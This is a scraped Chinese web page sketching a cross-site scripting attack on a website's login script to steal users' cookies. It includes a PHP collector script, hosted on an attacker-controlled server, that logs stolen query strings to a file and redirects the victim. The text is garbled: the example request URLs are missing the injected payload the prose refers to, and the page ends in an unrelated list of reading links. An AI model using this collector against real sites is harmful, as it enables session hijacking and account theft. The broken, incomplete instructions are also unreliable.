脚本大概思路
1.脚本大概思路 篇一
1. 构造一个提交,目标是能够显示用户Cookie信息:
www.xxxx.net/txl/login/login.pl?username=&passwd=&ok.x=28&ok.y=6
2. 如果上面的请求获得预期的效果,那么我们就可以尝试下面的请求:
www.xxx.net/txl/login/login.pl?username=&passwd=&ok.x=28&ok.y=6
其中www.xxx.org/info.php是你能够控制的某台主机上的一个脚本,功能是获取查询字符串的信息,内容如下:
$info = getenv(“QUERY_STRING”);
if ($info) {
$fp = fopen(“info.txt”,“a”);
fwrite($fp,$info.“n”);
fclose($fp);
}
header(“Location: www.xxx.net”);
注:“%2B”为“+”的URL编码,并且这里只能用“%2B”,因为“+”将被作为空格处理,
【脚本大概思路】推荐阅读:
预算员应该知道的大概数据11-30
应用文分类和大概格式(吐血整理)07-31
跨站点脚本攻击 脚本注入 解决 方案11-28
生前事迹脚本11-13
广告片脚本10-04
特种设备应急演练脚本06-21
城管队伍形象篇脚本06-23
医院防暴应急演练脚本07-21
有限空间应急演练脚本08-12